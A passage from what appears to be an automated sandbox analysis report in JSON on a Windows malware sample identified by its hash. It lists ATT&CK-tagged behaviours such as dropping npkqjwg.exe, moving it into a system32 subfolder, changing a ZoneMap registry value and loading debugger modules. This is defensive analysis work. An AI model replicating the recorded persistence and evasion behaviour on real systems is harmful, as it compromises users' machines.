\"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" trying to touch file \"C:\\dbghelp.dll\"\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" trying to touch file \"C:\\Windows\\system32\\dbghelp.dll\"\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" trying to touch file \"C:\\msvcr100.dll\"\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" trying to touch file \"C:\\Windows\\system32\\msvcr100.dll\"\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" trying to touch file \"pipe\\uqyipjlp\"\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" trying to touch file \"C:\\\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" trying to access non-existent file \"pipe\\uqyipjlp\"\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" trying to access non-existent file \"C:\\eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe.Local\\\"\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" trying to access non-existent file \"C:\\Windows\\System32\\cmd.exe:Zone.Identifier\"\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" trying to access non-existent file \"C:\\Windows\\System32\\sc.exe:Zone.Identifier\"\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" trying to access non-existent file \"C:\\Windows\\System32\\netsh.exe:Zone.Identifier\"\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" trying to access non-existent file \"C:\\EB12F84DC119300392E661B5B9AEFE380BACE7BA5DA9F7BF11EAC63D9C801EE7.EXE.LOCAL\"\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" trying to access non-existent file \"C:\\Windows\\System32\\cmd.exe:ZONE.IDENTIFIER\"\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" trying to access non-existent file \"C:\\Windows\\System32\\sc.exe:ZONE.IDENTIFIER\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-16", "type": 6, "relevance": 1, "name": "Connects to LPC ports", "description": "\"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" connecting to \"\\ThemeApiPort\"\n \"netsh.exe\" connecting to \"\\ThemeApiPort\"", "origin": "API Call", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Caches\"\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" touched file \"%LOCALAPPDATA%\\Microsoft\\Windows\\Caches\"\n \"svchost.exe\" touched file \"C:\\Windows\\system32\\config\\systemprofile:.repos\"\n \"svchost.exe\" touched file \"C:\\Windows\\system32\\config\\systemprofile\\Local Settings:.repos\"\n \"svchost.exe\" touched file \"C:\\Windows\\TEMP\\wincookie.repos\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\temp\\npkqjwg.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{04731B67-D933-450A-90E6-4ACD2E9408FE}\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{11016101-E366-4D22-BC06-4ADA335C892B}\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\INPROCSERVER32\"; Key: \"\"; Value: \"\")\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\INPROCSERVER32\"; Key: \"LOADWITHOUTCOM\"; Value: \"\")\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\COM3\"; Key: \"COM+ENABLED\"; Value: \"\")\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\"; Key: \"\"; Value: \"\")\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\INPROCSERVER32\"; Key: \"INPROCSERVER32\"; Value: \"\")\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\INPROCSERVER32\"; Key: \"THREADINGMODEL\"; Value: \"\")\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"MAXSXSHASHCOUNT\"; Value: \"\")\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\INTERNET EXPLORER\\EUPP PROTECTED - IT IS A VIOLATION OF WINDOWS POLICY TO MODIFY. SEE AKA.MS/BROWSERPOLICY\"; Key: \"FIRSTRUNCOMPLETE\"; Value: \"\")\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\DATACOLLECTION\"; Key: \"COMMERCIALDATAOPTIN\"; Value: \"\")\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"PREFEREXTERNALMANIFEST\"; Value: \"\")\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"CREATEURICACHESIZE\"; Value: \"\")\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"CREATEURICACHESIZE\"; Value: \"\")\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"CREATEURICACHESIZE\"; Value: \"\")\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"CREATEURICACHESIZE\"; Value: \"\")\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"ENABLEPUNYCODE\"; Value: \"\")\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"ENABLEPUNYCODE\"; Value: \"\")\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"ENABLEPUNYCODE\"; Value: \"\")\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"SECURITY_HKLM_ONLY\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"npkqjwg.exe.67B73C01.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"npkqjwg.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%TEMP%\\npkqjwg.exe]- [targetUID: 00000000-00004968]\n \"NPKQJWG.EXE.67B73C02.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" reads file \"c:\\eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\"\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" reads file \"c:\\users\\%osuser%\\desktop\\desktop.ini\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\DELEGATEFOLDERS\"; Key: \"\"; Value: \"\")\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\"; Key: \"\"; Value: \"\")\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\"; Key: \"\"; Value: \"\")\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{04731B67-D933-450A-90E6-4ACD2E9408FE}\"; Key: \"\"; Value: \"\")\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\"; Key: \"\"; Value: \"\")\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{11016101-E366-4D22-BC06-4ADA335C892B}\"; Key: \"\"; Value: \"\")\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\"; Key: \"\"; Value: \"\")\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\"; Key: \"\"; Value: \"\")\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\DELEGATEFOLDERS\"; Key: \"\"; Value: \"\")\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\SESSIONINFO\\1\"; Key: \"\"; Value: \"\")\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\SESSIONINFO\\1\\DESKTOP\\NAMESPACE\"; Key: \"\"; Value: \"\")\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\SESSIONINFO\\1\\DESKTOP\\NAMESPACE\\DELEGATEFOLDERS\"; Key: \"\"; Value: \"\")\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\INPROCSERVER32\"; Key: \"\"; Value: \"\")\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\INPROCSERVER32\"; Key: \"\"; Value: \"\")\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\COM3\"; Key: \"\"; Value: \"\")\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\"; Key: \"\"; Value: \"\")\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\"; Key: \"\"; Value: \"\")\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\TREATAS\"; Key: \"\"; Value: \"\")\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\TREATAS\"; Key: \"\"; Value: \"\")\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\PROGID\"; Key: \"\"; Value: \"\")\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\PROGID\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-12", "type": 6, "relevance": 4, "name": "Monitors specific registry key for changes", "description": "\"netsh.exe\" monitors \"HKLM\\SYSTEM\\ControlSet001\\Control\\NetworkProvider\\HwOrder\" (Filter: 4; Subtree: 0)\n \"netsh.exe\" monitors \"HKLM\\SYSTEM\\ControlSet001\\services\\WinSock2\\Parameters\\Protocol_Catalog9\" (Filter: 1; Subtree: 0)\n \"netsh.exe\" monitors \"HKLM\\SYSTEM\\ControlSet001\\services\\WinSock2\\Parameters\\NameSpace_Catalog5\" (Filter: 1; Subtree: 0)\n \"netsh.exe\" monitors \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\" (Filter: 5; Subtree: 1)\n \"svchost.exe\" monitors \"\\REGISTRY\\USER\\.DEFAULT\\Control Panel\\International\" (Filter: 4; Subtree: 1)\n \"svchost.exe\" monitors \"HKLM\\SYSTEM\\ControlSet001\\services\\WinSock2\\Parameters\\Protocol_Catalog9\" (Filter: 1; Subtree: 0)\n \"svchost.exe\" monitors \"HKLM\\SYSTEM\\ControlSet001\\services\\WinSock2\\Parameters\\NameSpace_Catalog5\" (Filter: 1; Subtree: 0)", "origin": "API Call", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "registry-179", "type": 3, "relevance": 1, "name": "Tries to map intranet network resources to internet zone", "description": "\"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"UNCASINTRANET\"; Value: \"00000000\")", "origin": "Registry Access", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "module-16", "type": 10, "relevance": 3, "name": "Loads the debugger/analysis tool module", "description": "\"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" loaded module \"%WINDIR%\\System32\\dbghelp.dll\" at 6EB80000\n \"npkqjwg.exe\" loaded module \"%WINDIR%\\System32\\dbghelp.dll\" at 6EB80000\n \"svchost.exe\" loaded module \"%WINDIR%\\System32\\dbghelp.dll\" at 6EB80000", "origin": "Loaded Module", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-10", "type": 6, "relevance": 6, "name": "Queries kernel debugger information", "description": "\"netsh.exe\" at 00000000-00005100-00000105-7401048", "origin": "API Call", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-162", "type": 6, "relevance": 1, "name": "Renames files", "description": "\"cmd.exe\" renamed original file\"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\npkqjwg.exe\" to \"%WINDIR%\\system32\\jfnxeyae\\npkqjwg.exe\"", "origin": "API Call", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-9", "type": 6, "relevance": 4, "name": "Queries process information", "description": "\"netsh.exe\" queried SystemProcessInformation at 00000000-00005100-00000105-540789 [PID: 5100]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00005100-00000105-1308780 [PID: 5100]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00005100-00000105-2076512 [PID: 5100]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00005100-00000105-2328532 [PID: 5100]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00005100-00000105-2861227 [PID: 5100]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00005100-00000105-3109239 [PID: 5100]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00005100-00000105-3784898 [PID: 5100]\n \"svchost.exe\" queried SystemProcessInformation at 00000000-00005656-00000105-122007 [PID: 5656]\n \"svchost.exe\" queried SystemProcessInformation at 00000000-00005656-00000105-808031 [PID: 5656]", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-39", "type": 6, "relevance": 8, "name": "Queries volume information of an entire harddrive", "description": "\"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" queries volume information of \"C:\\\" at 00000000-00004968-0000010C-1291938\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" queries volume information of \"C:\\\" at 00000000-00004968-0000010C-1293352\n \"npkqjwg.exe\" queries volume information of \"C:\\\" at 00000000-00001776-0000010C-2194542\n \"npkqjwg.exe\" queries volume information of \"C:\\\" at 00000000-00001776-0000010C-2196350\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00005656-0000010C-91702\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00005656-0000010C-1281954\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00005656-0000010C-2009650\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00005656-0000010C-2011594", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-11", "type": 6, "relevance": 2, "name": "Queries volume information", "description": "\"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" queries volume information of \"C:\\\" at 00000000-00004968-0000010C-1291938\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" queries volume information of \"C:\\\" at 00000000-00004968-0000010C-1293352\n \"npkqjwg.exe\" queries volume information of \"C:\\\" at 00000000-00001776-0000010C-2194542\n \"npkqjwg.exe\" queries volume information of \"C:\\\" at 00000000-00001776-0000010C-2196350\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00005656-0000010C-91702\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00005656-0000010C-1281954\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00005656-0000010C-2009650\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00005656-0000010C-2011594", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000001200780e7800fce2120080f4c675000078000000000089f4c675cf00cefb0200000070e312006ce3120064e2120068e2120018e4120095e177773f83c100c0e21200c83ad07534e31200d58cc87570e3120004e3120042a4c675a802d07544e31200d2f4c675080000006ef5c67544f5c6757701cefb0200000070aab86e0000130026bbb86e18e31200020000000000130070aab86e48e3120042a4c675a802d0758ce3120010a9b86e08000000e6a8b86ec99bc3fb0200000070aab86e0000130026bbb86eac0e7800780e780058e312008050c46e18e41200f9f2bc6eadd06995 (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"RtlGetVersion\" with parameter 